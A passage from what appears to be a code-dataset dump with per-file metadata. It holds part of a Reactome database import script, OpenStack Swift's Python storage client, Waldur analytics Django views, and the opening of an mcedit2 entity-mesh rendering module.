m = re.search('^(\d+)_(\w+)$', tablename)
pathway_id = int(m.group(1))
tabletype = m.group(2)
if tabletype == '6complex' or tabletype == '8convertedEntity':
component_type = None
if '6complex' == tabletype:
component_type = 'complex'
elif '8convertedEntity' == tabletype:
component_type = 'converted'
sc.execute('SELECT * FROM %s' % (tablename,))
for (local_id, name, location, reactome_id, component_local_id) in sc:
reactome_id = int(reactome_id[16:])
m = re.search('^([a-zA-Z_]+)', local_id)
tc.execute('INSERT INTO entities(entity_type, name, location, reactome_id, uniprot_id) '
'SELECT ?, ?, ?, ?, ? '
'WHERE NOT EXISTS(SELECT 1 FROM entities WHERE reactome_id=?)',
(m.group(1), name, location, reactome_id, None, reactome_id))
tc.execute('INSERT INTO entity_pathways '
'SELECT last_insert_rowid(), ?, ? '
'WHERE NOT EXISTS('
' SELECT 1 FROM entity_pathways WHERE entity_id=last_insert_rowid() AND pathway_id=?)',
(pathway_id, local_id, pathway_id))
tc.execute('INSERT INTO components '
'SELECT ?, entity_id, ? FROM entity_pathways '
'WHERE pathway_id=? AND local_id=?',
(reactome_id, component_type, pathway_id, component_local_id))
last_completion = 0
table_count = 0
print('Reactions:')
# Do reactions after all components are defined.
for tablename in tables:
table_count = table_count + 1
completion = int(20 * table_count / len(tables))
if completion > last_completion:
last_completion = completion
print(' ', completion * 5, '%')
m = re.search('^(\d+)_(\w+)$', tablename)
pathway_id = int(m.group(1))
tabletype = m.group(2)
if tabletype == '4reaction':
sc.execute('SELECT * FROM %s' % (tablename,))
for (local_id, name, local_input_id, local_output_id) in sc:
m = re.search('^([a-zA-Z_]+)', local_id)
tc.execute('INSERT INTO reactions(reaction_type, name, pathway_id, local_id) '
'SELECT ?, ?, ?, ? '
'WHERE NOT EXISTS(SELECT 1 FROM reactions WHERE pathway_id=? AND local_id=?)',
('standard', name, pathway_id, local_id, pathway_id, local_id))
tc.execute('SELECT reaction_id FROM reactions WHERE pathway_id=? and local_id=?',
(pathway_id, local_id))
reaction_id = tc.fetchone()[0]
# Each input/output pair has its own row, so we only need to grab one per loop.
tc.execute('SELECT entity_id FROM entity_pathways WHERE pathway_id=? AND local_id=?',
(pathway_id, local_input_id))
input_id = tc.fetchone()
if input_id:
input_id = input_id[0]
tc.execute('INSERT INTO reaction_entities '
'SELECT ?, ?, ? '
'WHERE NOT EXISTS(SELECT 1 FROM reaction_entities WHERE reaction_id=? AND entity_id=?)',
(reaction_id, input_id, 'input', reaction_id, input_id))
tc.execute('SELECT entity_id FROM entity_pathways WHERE pathway_id=? AND local_id=?',
(pathway_id, local_output_id))
output_id = tc.fetchone()
if output_id:
output_id = output_id[0]
tc.execute('INSERT INTO reaction_entities '
'SELECT ?, ?, ? '
'WHERE NOT EXISTS(SELECT 1 FROM reaction_entities WHERE reaction_id=? AND entity_id=?)',
(reaction_id, output_id, 'output', reaction_id, output_id))
target.commit()
|
bsd-3-clause
| -8,242,140,934,111,858,000
| 38.425
| 138
| 0.617628
| false
| 3.570566
| false
| false
| false
|
houseurmusic/my-swift
|
swift/common/client.py
|
1
|
33831
|
# Copyright (c) 2010-2011 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Cloud Files client library used internally
"""
import socket
from cStringIO import StringIO
from re import compile, DOTALL
from tokenize import generate_tokens, STRING, NAME, OP
from urllib import quote as _quote, unquote
from urlparse import urlparse, urlunparse
try:
from eventlet.green.httplib import HTTPException, HTTPSConnection
except ImportError:
from httplib import HTTPException, HTTPSConnection
try:
from eventlet import sleep
except ImportError:
from time import sleep
try:
from swift.common.bufferedhttp \
import BufferedHTTPConnection as HTTPConnection
except ImportError:
try:
from eventlet.green.httplib import HTTPConnection
except ImportError:
from httplib import HTTPConnection
def quote(value, safe='/'):
"""
Patched version of urllib.quote that encodes utf8 strings before quoting
"""
if isinstance(value, unicode):
value = value.encode('utf8')
return _quote(value, safe)
# look for a real json parser first
try:
# simplejson is popular and pretty good
from simplejson import loads as json_loads
except ImportError:
try:
# 2.6 will have a json module in the stdlib
from json import loads as json_loads
except ImportError:
# fall back on local parser otherwise
comments = compile(r'/\*.*\*/|//[^\r\n]*', DOTALL)
def json_loads(string):
'''
Fairly competent json parser exploiting the python tokenizer and
eval(). -- From python-cloudfiles
_loads(serialized_json) -> object
'''
try:
res = []
consts = {'true': True, 'false': False, 'null': None}
string = '(' + comments.sub('', string) + ')'
for type, val, _junk, _junk, _junk in \
generate_tokens(StringIO(string).readline):
if (type == OP and val not in '[]{}:,()-') or \
(type == NAME and val not in consts):
raise AttributeError()
elif type == STRING:
res.append('u')
res.append(val.replace('\\/', '/'))
else:
res.append(val)
return eval(''.join(res), {}, consts)
except Exception:
raise AttributeError()
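# Example (illustrative): json_loads('{"a": [1, true, null]}') evaluates,
# via the tokenizer whitelist above, to {u'a': [1, True, None]}.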
class ClientException(Exception):
def __init__(self, msg, http_scheme='', http_host='', http_port='',
http_path='', http_query='', http_status=0, http_reason='',
http_device=''):
Exception.__init__(self, msg)
self.msg = msg
self.http_scheme = http_scheme
self.http_host = http_host
self.http_port = http_port
self.http_path = http_path
self.http_query = http_query
self.http_status = http_status
self.http_reason = http_reason
self.http_device = http_device
def __str__(self):
a = self.msg
b = ''
if self.http_scheme:
b += '%s://' % self.http_scheme
if self.http_host:
b += self.http_host
if self.http_port:
b += ':%s' % self.http_port
if self.http_path:
b += self.http_path
if self.http_query:
b += '?%s' % self.http_query
if self.http_status:
if b:
b = '%s %s' % (b, self.http_status)
else:
b = str(self.http_status)
if self.http_reason:
if b:
b = '%s %s' % (b, self.http_reason)
else:
b = '- %s' % self.http_reason
if self.http_device:
if b:
b = '%s: device %s' % (b, self.http_device)
else:
b = 'device %s' % self.http_device
return b and '%s: %s' % (a, b) or a
def http_connection(url, proxy=None):
"""
Make an HTTPConnection or HTTPSConnection
:param url: url to connect to
:param proxy: proxy to connect through, if any; None by default; str of the
format 'http://127.0.0.1:8888' to set one
:returns: tuple of (parsed url, connection object)
:raises ClientException: Unable to handle protocol scheme
"""
parsed = urlparse(url)
proxy_parsed = urlparse(proxy) if proxy else None
if parsed.scheme == 'http':
conn = HTTPConnection((proxy_parsed if proxy else parsed).netloc)
elif parsed.scheme == 'https':
conn = HTTPSConnection((proxy_parsed if proxy else parsed).netloc)
else:
raise ClientException('Cannot handle protocol scheme %s for url %s' %
(parsed.scheme, repr(url)))
if proxy:
conn._set_tunnel(parsed.hostname, parsed.port)
return parsed, conn
def get_auth(url, user, key, snet=False):
"""
Get authentication/authorization credentials.
The snet parameter is used for Rackspace's ServiceNet internal network
implementation. In this function, it simply adds *snet-* to the beginning
of the host name for the returned storage URL. With Rackspace Cloud Files,
use of this network path causes no bandwidth charges but requires the
client to be running on Rackspace's ServiceNet network.
:param url: authentication/authorization URL
:param user: user to authenticate as
:param key: key or password for authorization
:param snet: use SERVICENET internal network (see above), default is False
:returns: tuple of (storage URL, auth token)
:raises ClientException: HTTP GET request to auth URL failed
"""
parsed, conn = http_connection(url)
conn.request('GET', parsed.path, '',
{'X-Auth-User': user, 'X-Auth-Key': key})
resp = conn.getresponse()
resp.read()
if resp.status < 200 or resp.status >= 300:
raise ClientException('Auth GET failed', http_scheme=parsed.scheme,
http_host=conn.host, http_port=conn.port,
http_path=parsed.path, http_status=resp.status,
http_reason=resp.reason)
url = resp.getheader('x-storage-url')
if snet:
parsed = list(urlparse(url))
# Second item in the list is the netloc
parsed[1] = 'snet-' + parsed[1]
url = urlunparse(parsed)
return url, resp.getheader('x-storage-token',
resp.getheader('x-auth-token'))
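# Illustrative usage (endpoint and credentials are placeholders):
# storage_url, token = get_auth('https://auth.example.com/v1.0',
#                               'account:user', 'secretkey')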
def get_account(url, token, marker=None, limit=None, prefix=None,
http_conn=None, full_listing=False):
"""
Get a listing of containers for the account.
:param url: storage URL
:param token: auth token
:param marker: marker query
:param limit: limit query
:param prefix: prefix query
:param http_conn: HTTP connection object (If None, it will create the
conn object)
:param full_listing: if True, return a full listing, else returns a max
of 10000 listings
:returns: a tuple of (response headers, a list of containers) The response
headers will be a dict and all header names will be lowercase.
:raises ClientException: HTTP GET request failed
"""
if not http_conn:
http_conn = http_connection(url)
if full_listing:
rv = get_account(url, token, marker, limit, prefix, http_conn)
listing = rv[1]
while listing:
marker = listing[-1]['name']
listing = \
get_account(url, token, marker, limit, prefix, http_conn)[1]
if listing:
rv[1].extend(listing)
return rv
parsed, conn = http_conn
qs = 'format=json'
if marker:
qs += '&marker=%s' % quote(marker)
if limit:
qs += '&limit=%d' % limit
if prefix:
qs += '&prefix=%s' % quote(prefix)
conn.request('GET', '%s?%s' % (parsed.path, qs), '',
{'X-Auth-Token': token})
resp = conn.getresponse()
resp_headers = {}
for header, value in resp.getheaders():
resp_headers[header.lower()] = value
if resp.status < 200 or resp.status >= 300:
resp.read()
raise ClientException('Account GET failed', http_scheme=parsed.scheme,
http_host=conn.host, http_port=conn.port,
http_path=parsed.path, http_query=qs, http_status=resp.status,
http_reason=resp.reason)
if resp.status == 204:
resp.read()
return resp_headers, []
return resp_headers, json_loads(resp.read())
def head_account(url, token, http_conn=None):
"""
Get account stats.
:param url: storage URL
:param token: auth token
:param http_conn: HTTP connection object (If None, it will create the
conn object)
:returns: a dict containing the response's headers (all header names will
be lowercase)
:raises ClientException: HTTP HEAD request failed
"""
if http_conn:
parsed, conn = http_conn
else:
parsed, conn = http_connection(url)
conn.request('HEAD', parsed.path, '', {'X-Auth-Token': token})
resp = conn.getresponse()
resp.read()
if resp.status < 200 or resp.status >= 300:
raise ClientException('Account HEAD failed', http_scheme=parsed.scheme,
http_host=conn.host, http_port=conn.port,
http_path=parsed.path, http_status=resp.status,
http_reason=resp.reason)
resp_headers = {}
for header, value in resp.getheaders():
resp_headers[header.lower()] = value
return resp_headers
def post_account(url, token, headers, http_conn=None):
"""
Update an account's metadata.
:param url: storage URL
:param token: auth token
:param headers: additional headers to include in the request
:param http_conn: HTTP connection object (If None, it will create the
conn object)
:raises ClientException: HTTP POST request failed
"""
if http_conn:
parsed, conn = http_conn
else:
parsed, conn = http_connection(url)
headers['X-Auth-Token'] = token
conn.request('POST', parsed.path, '', headers)
resp = conn.getresponse()
resp.read()
if resp.status < 200 or resp.status >= 300:
raise ClientException('Account POST failed',
http_scheme=parsed.scheme, http_host=conn.host,
http_port=conn.port, http_path=parsed.path, http_status=resp.status,
http_reason=resp.reason)
def get_container(url, token, container, marker=None, limit=None,
prefix=None, delimiter=None, http_conn=None,
full_listing=False):
"""
Get a listing of objects for the container.
:param url: storage URL
:param token: auth token
:param container: container name to get a listing for
:param marker: marker query
:param limit: limit query
:param prefix: prefix query
:param delimiter: string to delimit the queries on
:param http_conn: HTTP connection object (If None, it will create the
conn object)
:param full_listing: if True, return a full listing, else returns a max
of 10000 listings
:returns: a tuple of (response headers, a list of objects) The response
headers will be a dict and all header names will be lowercase.
:raises ClientException: HTTP GET request failed
"""
if not http_conn:
http_conn = http_connection(url)
if full_listing:
rv = get_container(url, token, container, marker, limit, prefix,
delimiter, http_conn)
listing = rv[1]
while listing:
if not delimiter:
marker = listing[-1]['name']
else:
marker = listing[-1].get('name', listing[-1].get('subdir'))
listing = get_container(url, token, container, marker, limit,
prefix, delimiter, http_conn)[1]
if listing:
rv[1].extend(listing)
return rv
parsed, conn = http_conn
path = '%s/%s' % (parsed.path, quote(container))
qs = 'format=json'
if marker:
qs += '&marker=%s' % quote(marker)
if limit:
qs += '&limit=%d' % limit
if prefix:
qs += '&prefix=%s' % quote(prefix)
if delimiter:
qs += '&delimiter=%s' % quote(delimiter)
conn.request('GET', '%s?%s' % (path, qs), '', {'X-Auth-Token': token})
resp = conn.getresponse()
if resp.status < 200 or resp.status >= 300:
resp.read()
raise ClientException('Container GET failed',
http_scheme=parsed.scheme, http_host=conn.host,
http_port=conn.port, http_path=path, http_query=qs,
http_status=resp.status, http_reason=resp.reason)
resp_headers = {}
for header, value in resp.getheaders():
resp_headers[header.lower()] = value
if resp.status == 204:
resp.read()
return resp_headers, []
return resp_headers, json_loads(resp.read())
def head_container(url, token, container, http_conn=None):
"""
Get container stats.
:param url: storage URL
:param token: auth token
:param container: container name to get stats for
:param http_conn: HTTP connection object (If None, it will create the
conn object)
:returns: a dict containing the response's headers (all header names will
be lowercase)
:raises ClientException: HTTP HEAD request failed
"""
if http_conn:
parsed, conn = http_conn
else:
parsed, conn = http_connection(url)
path = '%s/%s' % (parsed.path, quote(container))
conn.request('HEAD', path, '', {'X-Auth-Token': token})
resp = conn.getresponse()
resp.read()
if resp.status < 200 or resp.status >= 300:
raise ClientException('Container HEAD failed',
http_scheme=parsed.scheme, http_host=conn.host,
http_port=conn.port, http_path=path, http_status=resp.status,
http_reason=resp.reason)
resp_headers = {}
for header, value in resp.getheaders():
resp_headers[header.lower()] = value
return resp_headers
def put_container(url, token, container, headers=None, http_conn=None):
"""
Create a container
:param url: storage URL
:param token: auth token
:param container: container name to create
:param headers: additional headers to include in the request
:param http_conn: HTTP connection object (If None, it will create the
conn object)
:raises ClientException: HTTP PUT request failed
"""
if http_conn:
parsed, conn = http_conn
else:
parsed, conn = http_connection(url)
path = '%s/%s' % (parsed.path, quote(container))
if not headers:
headers = {}
headers['X-Auth-Token'] = token
conn.request('PUT', path, '', headers)
resp = conn.getresponse()
resp.read()
if resp.status < 200 or resp.status >= 300:
raise ClientException('Container PUT failed',
http_scheme=parsed.scheme, http_host=conn.host,
http_port=conn.port, http_path=path, http_status=resp.status,
http_reason=resp.reason)
def post_container(url, token, container, headers, http_conn=None):
"""
Update a container's metadata.
:param url: storage URL
:param token: auth token
:param container: container name to update
:param headers: additional headers to include in the request
:param http_conn: HTTP connection object (If None, it will create the
conn object)
:raises ClientException: HTTP POST request failed
"""
if http_conn:
parsed, conn = http_conn
else:
parsed, conn = http_connection(url)
path = '%s/%s' % (parsed.path, quote(container))
headers['X-Auth-Token'] = token
conn.request('POST', path, '', headers)
resp = conn.getresponse()
resp.read()
if resp.status < 200 or resp.status >= 300:
raise ClientException('Container POST failed',
http_scheme=parsed.scheme, http_host=conn.host,
http_port=conn.port, http_path=path, http_status=resp.status,
http_reason=resp.reason)
def delete_container(url, token, container, http_conn=None):
"""
Delete a container
:param url: storage URL
:param token: auth token
:param container: container name to delete
:param http_conn: HTTP connection object (If None, it will create the
conn object)
:raises ClientException: HTTP DELETE request failed
"""
if http_conn:
parsed, conn = http_conn
else:
parsed, conn = http_connection(url)
path = '%s/%s' % (parsed.path, quote(container))
conn.request('DELETE', path, '', {'X-Auth-Token': token})
resp = conn.getresponse()
resp.read()
if resp.status < 200 or resp.status >= 300:
raise ClientException('Container DELETE failed',
http_scheme=parsed.scheme, http_host=conn.host,
http_port=conn.port, http_path=path, http_status=resp.status,
http_reason=resp.reason)
def get_object(url, token, container, name, http_conn=None,
resp_chunk_size=None):
"""
Get an object
:param url: storage URL
:param token: auth token
:param container: container name that the object is in
:param name: object name to get
:param http_conn: HTTP connection object (If None, it will create the
conn object)
:param resp_chunk_size: if defined, chunk size of data to read. NOTE: If
you specify a resp_chunk_size you must fully read
the object's contents before making another
request.
:returns: a tuple of (response headers, the object's contents) The response
headers will be a dict and all header names will be lowercase.
:raises ClientException: HTTP GET request failed
"""
if http_conn:
parsed, conn = http_conn
else:
parsed, conn = http_connection(url)
path = '%s/%s/%s' % (parsed.path, quote(container), quote(name))
conn.request('GET', path, '', {'X-Auth-Token': token})
resp = conn.getresponse()
if resp.status < 200 or resp.status >= 300:
resp.read()
raise ClientException('Object GET failed', http_scheme=parsed.scheme,
http_host=conn.host, http_port=conn.port, http_path=path,
http_status=resp.status, http_reason=resp.reason)
if resp_chunk_size:
def _object_body():
buf = resp.read(resp_chunk_size)
while buf:
yield buf
buf = resp.read(resp_chunk_size)
object_body = _object_body()
else:
object_body = resp.read()
resp_headers = {}
for header, value in resp.getheaders():
resp_headers[header.lower()] = value
return resp_headers, object_body
def head_object(url, token, container, name, http_conn=None):
"""
Get object info
:param url: storage URL
:param token: auth token
:param container: container name that the object is in
:param name: object name to get info for
:param http_conn: HTTP connection object (If None, it will create the
conn object)
:returns: a dict containing the response's headers (all header names will
be lowercase)
:raises ClientException: HTTP HEAD request failed
"""
if http_conn:
parsed, conn = http_conn
else:
parsed, conn = http_connection(url)
path = '%s/%s/%s' % (parsed.path, quote(container), quote(name))
conn.request('HEAD', path, '', {'X-Auth-Token': token})
resp = conn.getresponse()
resp.read()
if resp.status < 200 or resp.status >= 300:
raise ClientException('Object HEAD failed', http_scheme=parsed.scheme,
http_host=conn.host, http_port=conn.port, http_path=path,
http_status=resp.status, http_reason=resp.reason)
resp_headers = {}
for header, value in resp.getheaders():
resp_headers[header.lower()] = value
return resp_headers
def put_object(url, token=None, container=None, name=None, contents=None,
content_length=None, etag=None, chunk_size=65536,
content_type=None, headers=None, http_conn=None, proxy=None):
"""
Put an object
:param url: storage URL
:param token: auth token; if None, no token will be sent
:param container: container name that the object is in; if None, the
container name is expected to be part of the url
:param name: object name to put; if None, the object name is expected to be
part of the url
:param contents: a string or a file like object to read object data from;
if None, a zero-byte put will be done
:param content_length: value to send as content-length header; also limits
the amount read from contents; if None, it will be
computed via the contents or chunked transfer
encoding will be used
:param etag: etag of contents; if None, no etag will be sent
:param chunk_size: chunk size of data to write; default 65536
:param content_type: value to send as content-type header; if None, no
content-type will be set (remote end will likely try
to auto-detect it)
:param headers: additional headers to include in the request, if any
:param http_conn: HTTP connection object (If None, it will create the
conn object)
:param proxy: proxy to connect through, if any; None by default; str of the
format 'http://127.0.0.1:8888' to set one
:returns: etag from server response
:raises ClientException: HTTP PUT request failed
"""
if http_conn:
parsed, conn = http_conn
else:
parsed, conn = http_connection(url, proxy=proxy)
path = parsed.path
if container:
path = '%s/%s' % (path.rstrip('/'), quote(container))
if name:
path = '%s/%s' % (path.rstrip('/'), quote(name))
if headers:
headers = dict(headers)
else:
headers = {}
if token:
headers['X-Auth-Token'] = token
if etag:
headers['ETag'] = etag.strip('"')
if content_length is not None:
headers['Content-Length'] = str(content_length)
else:
for n, v in headers.iteritems():
if n.lower() == 'content-length':
content_length = int(v)
if content_type is not None:
headers['Content-Type'] = content_type
if not contents:
headers['Content-Length'] = '0'
if hasattr(contents, 'read'):
conn.putrequest('PUT', path)
for header, value in headers.iteritems():
conn.putheader(header, value)
if content_length is None:
conn.putheader('Transfer-Encoding', 'chunked')
conn.endheaders()
chunk = contents.read(chunk_size)
while chunk:
conn.send('%x\r\n%s\r\n' % (len(chunk), chunk))
chunk = contents.read(chunk_size)
conn.send('0\r\n\r\n')
else:
conn.endheaders()
left = content_length
while left > 0:
size = chunk_size
if size > left:
size = left
chunk = contents.read(size)
conn.send(chunk)
left -= len(chunk)
else:
conn.request('PUT', path, contents, headers)
resp = conn.getresponse()
resp.read()
if resp.status < 200 or resp.status >= 300:
raise ClientException('Object PUT failed', http_scheme=parsed.scheme,
http_host=conn.host, http_port=conn.port, http_path=path,
http_status=resp.status, http_reason=resp.reason)
return resp.getheader('etag', '').strip('"')
def post_object(url, token, container, name, headers, http_conn=None):
"""
Update object metadata
:param url: storage URL
:param token: auth token
:param container: container name that the object is in
:param name: name of the object to update
:param headers: additional headers to include in the request
:param http_conn: HTTP connection object (If None, it will create the
conn object)
:raises ClientException: HTTP POST request failed
"""
if http_conn:
parsed, conn = http_conn
else:
parsed, conn = http_connection(url)
path = '%s/%s/%s' % (parsed.path, quote(container), quote(name))
headers['X-Auth-Token'] = token
conn.request('POST', path, '', headers)
resp = conn.getresponse()
resp.read()
if resp.status < 200 or resp.status >= 300:
raise ClientException('Object POST failed', http_scheme=parsed.scheme,
http_host=conn.host, http_port=conn.port, http_path=path,
http_status=resp.status, http_reason=resp.reason)
def delete_object(url, token=None, container=None, name=None, http_conn=None,
headers=None, proxy=None):
"""
Delete object
:param url: storage URL
:param token: auth token; if None, no token will be sent
:param container: container name that the object is in; if None, the
container name is expected to be part of the url
:param name: object name to delete; if None, the object name is expected to
be part of the url
:param http_conn: HTTP connection object (If None, it will create the
conn object)
:param headers: additional headers to include in the request
:param proxy: proxy to connect through, if any; None by default; str of the
format 'http://127.0.0.1:8888' to set one
:raises ClientException: HTTP DELETE request failed
"""
if http_conn:
parsed, conn = http_conn
else:
parsed, conn = http_connection(url, proxy=proxy)
path = parsed.path
if container:
path = '%s/%s' % (path.rstrip('/'), quote(container))
if name:
path = '%s/%s' % (path.rstrip('/'), quote(name))
if headers:
headers = dict(headers)
else:
headers = {}
if token:
headers['X-Auth-Token'] = token
conn.request('DELETE', path, '', headers)
resp = conn.getresponse()
resp.read()
if resp.status < 200 or resp.status >= 300:
raise ClientException('Object DELETE failed',
http_scheme=parsed.scheme, http_host=conn.host,
http_port=conn.port, http_path=path, http_status=resp.status,
http_reason=resp.reason)
class Connection(object):
"""Convenience class to make requests that will also retry the request"""
def __init__(self, authurl, user, key, retries=5, preauthurl=None,
preauthtoken=None, snet=False, starting_backoff=1):
"""
:param authurl: authentication URL
:param user: user name to authenticate as
:param key: key/password to authenticate with
:param retries: Number of times to retry the request before failing
:param preauthurl: storage URL (if you have already authenticated)
:param preauthtoken: authentication token (if you have already
authenticated)
:param snet: use SERVICENET internal network (see get_auth), default is False
:param starting_backoff: initial delay in seconds between retries; it is
doubled after each failed attempt
"""
self.authurl = authurl
self.user = user
self.key = key
self.retries = retries
self.http_conn = None
self.url = preauthurl
self.token = preauthtoken
self.attempts = 0
self.snet = snet
self.starting_backoff = starting_backoff
def get_auth(self):
return get_auth(self.authurl, self.user, self.key, snet=self.snet)
def http_connection(self):
return http_connection(self.url)
def _retry(self, reset_func, func, *args, **kwargs):
self.attempts = 0
backoff = self.starting_backoff
while self.attempts <= self.retries:
self.attempts += 1
try:
if not self.url or not self.token:
self.url, self.token = self.get_auth()
self.http_conn = None
if not self.http_conn:
self.http_conn = self.http_connection()
kwargs['http_conn'] = self.http_conn
rv = func(self.url, self.token, *args, **kwargs)
return rv
except (socket.error, HTTPException):
if self.attempts > self.retries:
raise
self.http_conn = None
except ClientException, err:
if self.attempts > self.retries:
raise
if err.http_status == 401:
self.url = self.token = None
if self.attempts > 1:
raise
elif err.http_status == 408:
self.http_conn = None
elif 500 <= err.http_status <= 599:
pass
else:
raise
sleep(backoff)
backoff *= 2
if reset_func:
reset_func(func, *args, **kwargs)
def head_account(self):
"""Wrapper for :func:`head_account`"""
return self._retry(None, head_account)
def get_account(self, marker=None, limit=None, prefix=None,
full_listing=False):
"""Wrapper for :func:`get_account`"""
# TODO(unknown): With full_listing=True this will restart the entire
# listing with each retry. Need to make a better version that just
# retries where it left off.
return self._retry(None, get_account, marker=marker, limit=limit,
prefix=prefix, full_listing=full_listing)
def post_account(self, headers):
"""Wrapper for :func:`post_account`"""
return self._retry(None, post_account, headers)
def head_container(self, container):
"""Wrapper for :func:`head_container`"""
return self._retry(None, head_container, container)
def get_container(self, container, marker=None, limit=None, prefix=None,
delimiter=None, full_listing=False):
"""Wrapper for :func:`get_container`"""
# TODO(unknown): With full_listing=True this will restart the entire
# listing with each retry. Need to make a better version that just
# retries where it left off.
return self._retry(None, get_container, container, marker=marker,
limit=limit, prefix=prefix, delimiter=delimiter,
full_listing=full_listing)
def put_container(self, container, headers=None):
"""Wrapper for :func:`put_container`"""
return self._retry(None, put_container, container, headers=headers)
def post_container(self, container, headers):
"""Wrapper for :func:`post_container`"""
return self._retry(None, post_container, container, headers)
def delete_container(self, container):
"""Wrapper for :func:`delete_container`"""
return self._retry(None, delete_container, container)
def head_object(self, container, obj):
"""Wrapper for :func:`head_object`"""
return self._retry(None, head_object, container, obj)
def get_object(self, container, obj, resp_chunk_size=None):
"""Wrapper for :func:`get_object`"""
return self._retry(None, get_object, container, obj,
resp_chunk_size=resp_chunk_size)
def put_object(self, container, obj, contents, content_length=None,
etag=None, chunk_size=65536, content_type=None,
headers=None):
"""Wrapper for :func:`put_object`"""
def _default_reset(*args, **kwargs):
raise ClientException('put_object(%r, %r, ...) failure and no '
'ability to reset contents for reupload.' % (container, obj))
reset_func = _default_reset
tell = getattr(contents, 'tell', None)
seek = getattr(contents, 'seek', None)
if tell and seek:
orig_pos = tell()
reset_func = lambda *a, **k: seek(orig_pos)
elif not contents:
reset_func = lambda *a, **k: None
return self._retry(reset_func, put_object, container, obj, contents,
content_length=content_length, etag=etag, chunk_size=chunk_size,
content_type=content_type, headers=headers)
def post_object(self, container, obj, headers):
"""Wrapper for :func:`post_object`"""
return self._retry(None, post_object, container, obj, headers)
def delete_object(self, container, obj):
"""Wrapper for :func:`delete_object`"""
return self._retry(None, delete_object, container, obj)
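# Illustrative end-to-end usage of Connection (all values are placeholders):
# conn = Connection('https://auth.example.com/v1.0', 'account:user', 'secretkey')
# conn.put_container('backups')
# conn.put_object('backups', 'hello.txt', 'hello world', content_type='text/plain')
# headers, body = conn.get_object('backups', 'hello.txt')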
|
apache-2.0
| -1,593,031,386,800,875,800
| 37.313703
| 79
| 0.593627
| false
| 4.150534
| false
| false
| false
|
opennode/waldur-mastermind
|
src/waldur_mastermind/analytics/views.py
|
1
|
3899
|
import collections
from datetime import timedelta
from django.contrib.contenttypes.models import ContentType
from django.db.models.expressions import OuterRef, Subquery
from rest_framework import status, viewsets
from rest_framework.response import Response
from waldur_core.quotas.models import Quota
from waldur_core.structure.models import Project
from waldur_mastermind.billing.models import PriceEstimate
from waldur_mastermind.invoices.models import InvoiceItem
from waldur_mastermind.invoices.utils import get_current_month, get_current_year
from . import models, serializers
class DailyQuotaHistoryViewSet(viewsets.GenericViewSet):
# Fix for schema generation
queryset = []
def list(self, request):
serializer = serializers.DailyHistoryQuotaSerializer(
data=request.query_params, context={'request': request},
)
serializer.is_valid(raise_exception=True)
result = self.get_result(serializer.validated_data)
return Response(result)
def get_result(self, query):
scope = query['scope']
quota_names = query['quota_names']
start = query['start']
end = query['end']
quotas = models.DailyQuotaHistory.objects.filter(
scope=scope, name__in=quota_names, date__gte=start, date__lte=end,
).only('name', 'date', 'usage',)
charts = collections.defaultdict(dict)
for quota in quotas:
charts[quota.name][quota.date] = quota.usage
values = collections.defaultdict(list)
day = timedelta(days=1)
days = (end - start).days
for name in quota_names:
usage = 0
for i in range(days + 1):
date = start + i * day
usage = charts[name].get(date, usage)
values[name].append(usage)
return values
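# Example of the carry-forward above (illustrative values): with stored points
# {Mon: 5, Wed: 7} for quota "ram" over Mon..Thu, the returned series is
# {"ram": [5, 5, 7, 7]} -- days without a record repeat the last known usage.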
class ProjectQuotasViewSet(viewsets.GenericViewSet):
# Fix for schema generation
queryset = []
def list(self, request):
quota_name = request.query_params.get('quota_name')
if not quota_name:
return Response(status=status.HTTP_400_BAD_REQUEST)
content_type = ContentType.objects.get_for_model(Project)
if quota_name == 'estimated_price':
projects = self.annotate_estimated_price(content_type)
elif quota_name == 'current_price':
projects = self.annotate_current_price(content_type)
else:
projects = self.annotate_quotas(quota_name, content_type)
return Response(
[
{
'project_name': project.name,
'customer_name': project.customer.name,
'customer_abbreviation': project.customer.abbreviation,
'value': project.value,
}
for project in projects
]
)
def annotate_quotas(self, quota_name, content_type):
quotas = Quota.objects.filter(
object_id=OuterRef('pk'), content_type=content_type, name=quota_name,
)
subquery = Subquery(quotas.values('usage')[:1])
return Project.objects.annotate(value=subquery)
def annotate_estimated_price(self, content_type):
estimates = PriceEstimate.objects.filter(
object_id=OuterRef('pk'), content_type=content_type,
)
subquery = Subquery(estimates.values('total')[:1])
return Project.objects.annotate(value=subquery)
def annotate_current_price(self, content_type):
projects = Project.objects.all()
year, month = get_current_year(), get_current_month()
for project in projects:
items = InvoiceItem.objects.filter(
invoice__year=year, invoice__month=month, project_id=project.id
)
project.value = sum(item.price_current for item in items)
return projects
|
mit
| -5,358,902,503,370,012,000
| 35.783019
| 81
| 0.631957
| false
| 4.192473
| false
| false
| false
|
Rubisk/mcedit2
|
src/mcedit2/rendering/chunkmeshes/entitymesh.py
|
1
|
4131
|
"""
${NAME}
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import numpy
from mcedit2.rendering import renderstates, scenegraph
from mcedit2.rendering.blockmeshes import standardCubeTemplates
from mcedit2.rendering.blockmeshes import ChunkMeshBase
from mcedit2.rendering.layers import Layer
from mcedit2.rendering.slices import _XYZ
from mcedit2.rendering.vertexarraybuffer import QuadVertexArrayBuffer
log = logging.getLogger(__name__)
class EntityMeshBase(ChunkMeshBase):
renderstate = renderstates.RenderstateEntityNode
detailLevels = (0, 1, 2)
def _computeVertices(self, positions, colors, offset=False, chunkPosition=(0, 0)):
cx, cz = chunkPosition
x = cx << 4
z = cz << 4
bounds = self.chunkUpdate.updateTask.worldScene.bounds
if bounds:
positions = [p for p in positions if p in bounds]
vertexBuffer = QuadVertexArrayBuffer(len(positions) * 6, lights=False, textures=False)
vertexBuffer.buffer.shape = (len(positions), 6) + vertexBuffer.buffer.shape[-2:]
if len(positions):
positions = numpy.array(positions, dtype=float)
positions[:, (0, 2)] -= (x, z)
if offset:
positions -= 0.5
vertexBuffer.rgba[:] = colors
vertexBuffer.vertex[:] = positions[:, numpy.newaxis, numpy.newaxis, :]
vertexBuffer.vertex[:] += standardCubeTemplates[_XYZ]
vertexBuffer.buffer.shape = (len(positions) * 6, ) + vertexBuffer.buffer.shape[-2:]
return vertexBuffer
class TileEntityMesh(EntityMeshBase):
layer = Layer.TileEntities
def makeChunkVertices(self, chunk, limitBox):
tilePositions = []
for i, ref in enumerate(chunk.TileEntities):
